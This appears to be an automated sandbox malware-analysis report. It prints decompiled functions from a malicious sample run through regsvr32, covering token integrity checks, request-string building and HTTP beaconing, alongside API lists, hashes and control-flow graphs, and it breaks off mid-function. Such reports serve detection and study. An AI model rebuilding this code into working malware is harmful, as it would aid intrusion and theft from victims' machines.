                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
                    • String ID:
                    • API String ID: 2824497044-0
                    • Opcode ID: eaf52de2b4ad80542e7377d033ee37e4f20befb70d41f00f8339700ba3cd925d
                    • Instruction ID: 1c8ed64135f21e16ee1efcdb0b86d2685e137127439ebc333356c754b20d39f3
                    • Opcode Fuzzy Hash: eaf52de2b4ad80542e7377d033ee37e4f20befb70d41f00f8339700ba3cd925d
                    • Instruction Fuzzy Hash: C8114976E007486BEA31AFAAECC4C1BB7FDAF443843551D29E086D3510CB35FC868A64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F913CF Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 100%
                    			E04F913CF(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x4f9a2fc > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E04F963FD(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E04F917AB(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                    0x04f913dc
                    0x04f913e3
                    0x04f913ea
                    0x04f913fe
                    0x04f91409
                    0x04f91421
                    0x04f9142e
                    0x04f91431
                    0x04f91436
                    0x04f91441
                    0x04f91445
                    0x04f91454
                    0x04f91458
                    0x04f91474
                    0x04f91474
                    0x04f91478
                    0x04f91478
                    0x04f9147d
                    0x04f91481
                    0x04f91487
                    0x04f91488
                    0x04f9148f
                    0x04f91495

                    APIs
                    • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04F91401
                    • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04F91421
                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04F91431
                    • CloseHandle.KERNEL32(00000000), ref: 04F91481
                      • Part of subcall function 04F963FD: RtlAllocateHeap.NTDLL(00000000,00000000,04F928D5), ref: 04F96409
                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04F91454
                    • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04F9145C
                    • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04F9146C
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                    • String ID:
                    • API String ID: 1295030180-0
                    • Opcode ID: 8a62d5aa4e07ca65f1cec7334f66a5df0fc779efb38245495873e28cc86950e9
                    • Instruction ID: 2b20ffd40fb27e5d52ace430077cbe895ec7e120626f91e1a95bb91f355247e0
                    • Opcode Fuzzy Hash: 8a62d5aa4e07ca65f1cec7334f66a5df0fc779efb38245495873e28cc86950e9
                    • Instruction Fuzzy Hash: 3D212875D0024EFFFF009FA5DD84EAEBBB9EB49304F0040A5E910A6260DB755E55DB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F918BA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 64%
                    			E04F918BA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x4f9a320; // 0xb2d5a8
				_t1 = _t9 + 0x4f9b62c; // 0x253d7325
				_t36 = 0;
				_t28 = E04F961A7(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t40 = E04F963FD(_v8 +  *_t39(_a4) + 1);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E04F97885(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E04F917AB(_t40);
						_t42 = E04F96863(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E04F917AB(_t36);
							_t36 = _t42;
						}
						_t43 = E04F95ACD(_t36, _t33);
						if(_t43 != 0) {
							E04F917AB(_t36);
							_t36 = _t43;
						}
					}
					E04F917AB(_t28);
				}
				return _t36;
			}
















                    0x04f918ba
                    0x04f918bd
                    0x04f918be
                    0x04f918c5
                    0x04f918cc
                    0x04f918d3
                    0x04f918d7
                    0x04f918de
                    0x04f918e5
                    0x04f918ea
                    0x04f918fc
                    0x04f91900
                    0x04f91904
                    0x04f9190a
                    0x04f9190f
                    0x04f91919
                    0x04f9191f
                    0x04f91921
                    0x04f91938
                    0x04f9193c
                    0x04f9193f
                    0x04f91944
                    0x04f91944
                    0x04f9194d
                    0x04f91951
                    0x04f91954
                    0x04f91959
                    0x04f91959
                    0x04f91951
                    0x04f9195c
                    0x04f91961
                    0x04f91967

                    APIs
                      • Part of subcall function 04F961A7: lstrlen.KERNEL32(00000000,00000000,00000000,7691C740,?,?,?,04F918D3,253D7325,00000000,7691C740,?,?,04F96ABB,?,05AC95B0), ref: 04F9620E
                      • Part of subcall function 04F961A7: sprintf.NTDLL ref: 04F9622F
                    • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,04F96ABB,?,05AC95B0), ref: 04F918E5
                    • lstrlen.KERNEL32(?,?,?,04F96ABB,?,05AC95B0), ref: 04F918ED
                      • Part of subcall function 04F963FD: RtlAllocateHeap.NTDLL(00000000,00000000,04F928D5), ref: 04F96409
                    • strcpy.NTDLL ref: 04F91904
                    • lstrcat.KERNEL32(00000000,?), ref: 04F9190F
                      • Part of subcall function 04F97885: lstrlen.KERNEL32(?,?,?,00000000,?,04F9191E,00000000,?,?,?,04F96ABB,?,05AC95B0), ref: 04F97896
                      • Part of subcall function 04F917AB: HeapFree.KERNEL32(00000000,00000000,04F92976,00000000,?,?,00000000), ref: 04F917B7
                    • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04F96ABB,?,05AC95B0), ref: 04F9192C
                      • Part of subcall function 04F96863: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04F91938,00000000,?,?,04F96ABB,?,05AC95B0), ref: 04F9686D
                      • Part of subcall function 04F96863: _snprintf.NTDLL ref: 04F968CB
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                    • String ID: =
                    • API String ID: 2864389247-1428090586
                    • Opcode ID: 2259d6411da811b92c9e4ac562a6f46e91b23d5a1d7076c3549c29e054fdfdd0
                    • Instruction ID: 7007fc1dee324c814e65ec91c28804df03193f9d5f0d6527f3bd10edfcd6ae1b
                    • Opcode Fuzzy Hash: 2259d6411da811b92c9e4ac562a6f46e91b23d5a1d7076c3549c29e054fdfdd0
                    • Instruction Fuzzy Hash: 82117377D01526777F126B759C84CAE37FD9F85A543090129F901E7200DE78ED0387A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F91E51 Relevance: 9.2, APIs: 6, Instructions: 152memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 341 4f91e51-4f91e9d SysAllocString 342 4f91fc1-4f91fc4 341->342 343 4f91ea3-4f91ecf 341->343 344 4f91fcf-4f91fd2 342->344 345 4f91fc6-4f91fc9 SafeArrayDestroy 342->345 349 4f91fbe 343->349 350 4f91ed5-4f91ee1 call 4f956cf 343->350 347 4f91fdd-4f91fe4 344->347 348 4f91fd4-4f91fd7 SysFreeString 344->348 345->344 348->347 349->342 350->349 353 4f91ee7-4f91ef7 350->353 353->349 355 4f91efd-4f91f23 IUnknown_QueryInterface_Proxy 353->355 355->349 357 4f91f29-4f91f3d 355->357 359 4f91f7b-4f91f7e 357->359 360 4f91f3f-4f91f42 357->360 361 4f91f80-4f91f85 359->361 362 4f91fb5-4f91fba 359->362 360->359 363 4f91f44-4f91f5b StrStrIW 360->363 361->362 364 4f91f87-4f91f92 call 4f957a8 361->364 362->349 365 4f91f5d-4f91f66 call 4f93d67 363->365 366 4f91f72-4f91f75 SysFreeString 363->366 370 4f91f97-4f91f9b 364->370 365->366 371 4f91f68-4f91f70 call 4f956cf 365->371 366->359 370->362 372 4f91f9d-4f91fa2 370->372 371->366 374 4f91fb0 372->374 375 4f91fa4-4f91fae 372->375 374->362 375->362
                    APIs
                    • SysAllocString.OLEAUT32(?), ref: 04F91E92
                    • IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 04F91F14
                    • StrStrIW.SHLWAPI(?,006E0069), ref: 04F91F53
                    • SysFreeString.OLEAUT32(?), ref: 04F91F75
                      • Part of subcall function 04F93D67: SysAllocString.OLEAUT32(04F99290), ref: 04F93DB7
                    • SafeArrayDestroy.OLEAUT32(?), ref: 04F91FC9
                    • SysFreeString.OLEAUT32(?), ref: 04F91FD7
                      • Part of subcall function 04F956CF: Sleep.KERNEL32(000001F4), ref: 04F95717
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                    • String ID:
                    • API String ID: 2118684380-0
                    • Opcode ID: 01e46d3d4dc829cac1b7695ee3280adba7c82c3cf6db35752b548e1eab4cfe6a
                    • Instruction ID: da3225cb26360bf98d5b77efbf56db263ac1550479cc5c52db57b21f3b342bc5
                    • Opcode Fuzzy Hash: 01e46d3d4dc829cac1b7695ee3280adba7c82c3cf6db35752b548e1eab4cfe6a
                    • Instruction Fuzzy Hash: 3E513F7690020EAFEF10DFA4D98489EB7F6FF88344B158938E515DB224DB35AD46CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F943D8 Relevance: 9.0, APIs: 6, Instructions: 45networkCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 377 4f943d8-4f943e7 378 4f943e9-4f943f9 call 4f9395b 377->378 379 4f943fb-4f943ff call 4f97a34 377->379 378->379 384 4f9444a GetLastError 378->384 383 4f94404-4f94406 379->383 385 4f94408-4f9442d ResetEvent * 2 HttpSendRequestA 383->385 386 4f94445-4f94448 383->386 389 4f9444c-4f9444e 384->389 387 4f9443a-4f9443d SetEvent 385->387 388 4f9442f-4f94436 GetLastError 385->388 386->384 386->389 391 4f94443 387->391 388->386 390 4f94438 388->390 390->391 391->386
                    C-Code - Quality: 100%
                    			E04F943D8(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E04F9395B(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E04F97A34(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                    0x04f943d8
                    0x04f943e5
                    0x04f943e7
                    0x04f9444a
                    0x00000000
                    0x04f9444a
                    0x04f943ff
                    0x04f94406
                    0x04f94412
                    0x04f94417
                    0x04f9442d
                    0x04f9443d
                    0x00000000
                    0x04f9442f
                    0x04f9442f
                    0x04f94436
                    0x04f94443
                    0x04f94443
                    0x04f94443
                    0x04f94436
                    0x04f9442d
                    0x04f94448
                    0x00000000
                    0x00000000
                    0x04f9444e

                    APIs
                    • ResetEvent.KERNEL32(?,00000008,?,?,00000102,04F91AE3,?,?,00000000,00000000), ref: 04F94412
                    • ResetEvent.KERNEL32(?), ref: 04F94417
                    • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 04F94424
                    • GetLastError.KERNEL32 ref: 04F9442F
                    • GetLastError.KERNEL32(?,?,00000102,04F91AE3,?,?,00000000,00000000), ref: 04F9444A
                      • Part of subcall function 04F9395B: lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,04F943F7,?,?,?,?,00000102,04F91AE3,?,?,00000000), ref: 04F93967
                      • Part of subcall function 04F9395B: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04F943F7,?,?,?,?,00000102,04F91AE3,?), ref: 04F939C5
                      • Part of subcall function 04F9395B: lstrcpy.KERNEL32(00000000,00000000), ref: 04F939D5
                    • SetEvent.KERNEL32(?), ref: 04F9443D
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                    • String ID:
                    • API String ID: 3739416942-0
                    • Opcode ID: 538ce8c85507eaa4000bc5f0c3f865a1e88844b51e021b622590c5fbe0baa9e2
                    • Instruction ID: 1aa8de5f6e2d5fabf79ba0fe6077dbecdc5ea3ce9414bd5df3bb02287f66ef61
                    • Opcode Fuzzy Hash: 538ce8c85507eaa4000bc5f0c3f865a1e88844b51e021b622590c5fbe0baa9e2
                    • Instruction Fuzzy Hash: C8014B31508200AAFF316F35EC44F5B7AE9EF94728F214629F961920F0DB61EC479A12
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F93A12 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 392 4f93a12-4f93a57 wsprintfA 393 4f93a59-4f93a61 RtlAllocateHeap 392->393 394 4f93a7b-4f93a83 RtlAllocateHeap 392->394 395 4f93aa0 393->395 397 4f93a63-4f93a74 call 4f92fc4 393->397 394->395 396 4f93a85-4f93a96 call 4f968eb 394->396 399 4f93aa7-4f93aab 395->399 401 4f93a9b-4f93a9e 396->401 404 4f93a79 397->404 402 4f93aad-4f93ac8 call 4f952a9 call 4f94dc8 399->402 403 4f93ae5 399->403 401->399 410 4f93aca-4f93ad9 call 4f95f6a 402->410 411 4f93af5-4f93b06 402->411 405 4f93aeb-4f93af2 403->405 404->401 410->403 411->405 412 4f93b08-4f93b0f 411->412 412->405
                    C-Code - Quality: 65%
                    			E04F93A12(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				intOrPtr _t30;
				intOrPtr _t37;
				void* _t38;
				intOrPtr* _t43;
				void* _t44;
				void* _t48;
				intOrPtr* _t49;
				void* _t50;
				intOrPtr _t51;

				_t48 = __edx;
				_t44 = __ecx;
				_t43 = _a16;
				_t49 = __eax;
				_t22 =  *0x4f9a320; // 0xb2d5a8
				_t2 = _t22 + 0x4f9b682; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t43);
				_t51 =  *0x4f9a3e0; // 0x5ac9b60
				_push(0x800);
				_push(0);
				_push( *0x4f9a2d8);
				if( *0x4f9a2ec >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_a4 = 8;
						L7:
						if(_a4 != 0) {
							L10:
							 *0x4f9a2ec =  *0x4f9a2ec + 1;
							L11:
							return _a4;
						}
						_t52 = _a16;
						 *_t49 = _a16;
						_t50 = _v8;
						 *_t43 = E04F952A9(_t52, _t50); // executed
						_t30 = E04F94DC8(_t50, _t52); // executed
						if(_t30 != 0) {
							 *_a8 = _t50;
							 *_a12 = _t30;
							if( *0x4f9a2ec < 5) {
								 *0x4f9a2ec =  *0x4f9a2ec & 0x00000000;
							}
							goto L11;
						}
						_a4 = 0xbf;
						E04F95F6A();
						RtlFreeHeap( *0x4f9a2d8, 0, _t50); // executed
						goto L10;
					}
					_t37 = E04F968EB(_a4, _t48, _t51,  &_v48,  &_v8,  &_a16, _t26);
					L5:
					_a4 = _t37;
					goto L7;
				}
				_t38 = RtlAllocateHeap(); // executed
				if(_t38 == 0) {
					goto L6;
				}
				_t37 = E04F92FC4(_a4, _t44, _t48, _t51,  &_v48,  &_v8,  &_a16, _t38); // executed
				goto L5;
			}
















                    0x04f93a12
                    0x04f93a12
                    0x04f93a19
                    0x04f93a20
                    0x04f93a24
                    0x04f93a29
                    0x04f93a34
                    0x04f93a3a
                    0x04f93a4a
                    0x04f93a4f
                    0x04f93a51
                    0x04f93a57
                    0x04f93a83
                    0x04f93aa0
                    0x04f93aa0
                    0x04f93aa7
                    0x04f93aab
                    0x04f93ae5
                    0x04f93ae5
                    0x04f93aeb
                    0x04f93af2
                    0x04f93af2
                    0x04f93aad
                    0x04f93ab0
                    0x04f93ab2
                    0x04f93abf
                    0x04f93ac1
                    0x04f93ac8
                    0x04f93aff
                    0x04f93b04
                    0x04f93b06
                    0x04f93b08
                    0x04f93b08
                    0x00000000
                    0x04f93b06
                    0x04f93aca
                    0x04f93ad1
                    0x04f93adf
                    0x00000000
                    0x04f93adf
                    0x04f93a96
                    0x04f93a9b
                    0x04f93a9b
                    0x00000000
                    0x04f93a9b
                    0x04f93a59
                    0x04f93a61
                    0x00000000
                    0x00000000
                    0x04f93a74
                    0x00000000

                    APIs
                    • wsprintfA.USER32 ref: 04F93A34
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04F93A59
                      • Part of subcall function 04F92FC4: GetTickCount.KERNEL32 ref: 04F92FD8
                      • Part of subcall function 04F92FC4: wsprintfA.USER32 ref: 04F93028
                      • Part of subcall function 04F92FC4: wsprintfA.USER32 ref: 04F93045
                      • Part of subcall function 04F92FC4: wsprintfA.USER32 ref: 04F93065
                      • Part of subcall function 04F92FC4: wsprintfA.USER32 ref: 04F93091
                      • Part of subcall function 04F92FC4: HeapFree.KERNEL32(00000000,00000000), ref: 04F930A3
                      • Part of subcall function 04F92FC4: wsprintfA.USER32 ref: 04F930C4
                      • Part of subcall function 04F92FC4: HeapFree.KERNEL32(00000000,00000000), ref: 04F930D4
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04F93A7B
                    • RtlFreeHeap.NTDLL(00000000,?,?), ref: 04F93ADF
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: wsprintf$Heap$Free$Allocate$CountTick
                    • String ID: Ut
                    • API String ID: 1428766365-8415677
                    • Opcode ID: e4125d46180dcfa1604c0f47cb0c4eabd642e2be84be3269f96fc045c84cf5e2
                    • Instruction ID: e06a0c97f22a9bfd8976de6d46b4b5f29c007a7d55b99df1881804e9b9c0d0a9
                    • Opcode Fuzzy Hash: e4125d46180dcfa1604c0f47cb0c4eabd642e2be84be3269f96fc045c84cf5e2
                    • Instruction Fuzzy Hash: B0310C76A00109EBEF12DFA4E884E9A3BEDEB08355F108016F905D7240DB75AD46DBA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F91000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29sleepmemoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 50%
                    			E04F91000(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x4f9a3cc; // 0x5ac95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x4f9a3cc; // 0x5ac95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x4f9a030) {
					HeapFree( *0x4f9a2d8, 0, _t8);
				}
				_t9 = E04F93B61(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x4f9a3cc; // 0x5ac95b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











                    0x04f91000
                    0x04f91000
                    0x04f91009
                    0x04f91019
                    0x04f91019
                    0x04f9101e
                    0x04f91023
                    0x00000000
                    0x00000000
                    0x04f91013
                    0x04f91013
                    0x04f91025
                    0x04f91029
                    0x04f9103b
                    0x04f9103b
                    0x04f91046
                    0x04f9104b
                    0x04f9104e
                    0x04f91053
                    0x04f91057
                    0x04f9105d

                    APIs
                    • RtlEnterCriticalSection.NTDLL(05AC9570), ref: 04F91009
                    • Sleep.KERNEL32(0000000A), ref: 04F91013
                    • HeapFree.KERNEL32(00000000,00000000), ref: 04F9103B
                    • RtlLeaveCriticalSection.NTDLL(05AC9570), ref: 04F91057
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                    • String ID: Ut
                    • API String ID: 58946197-8415677
                    • Opcode ID: 96ba90d6ff7da0e9461a719da2d5d9ed08b455f449f13402b8d75e861eda1884
                    • Instruction ID: f80fde7fc5c8998c2a13c152d8489cb235db1e5dedf54b83e9d4b61f6f935a39
                    • Opcode Fuzzy Hash: 96ba90d6ff7da0e9461a719da2d5d9ed08b455f449f13402b8d75e861eda1884
                    • Instruction Fuzzy Hash: 52F03AB0A00296BBFF249F79ED48E1A3BF4EB04344B008014F812D62B1DA3AEC51DA24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F96535 Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 57%
                    			E04F96535(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t63;
				CHAR* _t67;
				CHAR* _t68;
				char* _t69;
				void* _t70;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E04F94843();
				if(_t21 != 0) {
					_t59 =  *0x4f9a2fc; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x4f9a2fc = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x4f9a178(0, 2);
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E04F91649( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x4f9a320; // 0xb2d5a8
					if( *0x4f9a2fc > 5) {
						_t8 = _t26 + 0x4f9b5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x4f9b9f5; // 0x44283a44
						_t27 = _t7;
					}
					E04F95A2D(_t27, _t27);
					_t31 = E04F9414A(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t63 = 5;
					if(_t54 != _t63) {
						 *0x4f9a310 =  *0x4f9a310 ^ 0x81bbe65d;
						_t32 = E04F963FD(0x60);
						__eflags = _t32;
						 *0x4f9a3cc = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x4f9a3cc; // 0x5ac95b0
							_t70 = _t70 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x4f9a3cc; // 0x5ac95b0
							 *_t51 = 0x4f9b81a;
						}
						__eflags = 0;
						_t54 = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x4f9a2d8, 0, 0x43);
							__eflags = _t36;
							 *0x4f9a364 = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x4f9a2fc; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x4f9a320; // 0xb2d5a8
								_t13 = _t58 + 0x4f9b55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x4f99287);
							}
							__eflags = 0;
							_t54 = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E04F921BC( ~_v8 &  *0x4f9a310, 0x4f9a00c); // executed
								_t42 = E04F94EF3(0, _t55, _t63, 0x4f9a00c); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E04F93C10(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t67 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E04F95458(_t61, _t67, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t67;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E04F97576(__eflags,  &(_t67[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t68 = _v12;
						if(_t68 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x4f9a17c();
							}
							goto L34;
						}
						_t69 =  &(_t68[4]);
						do {
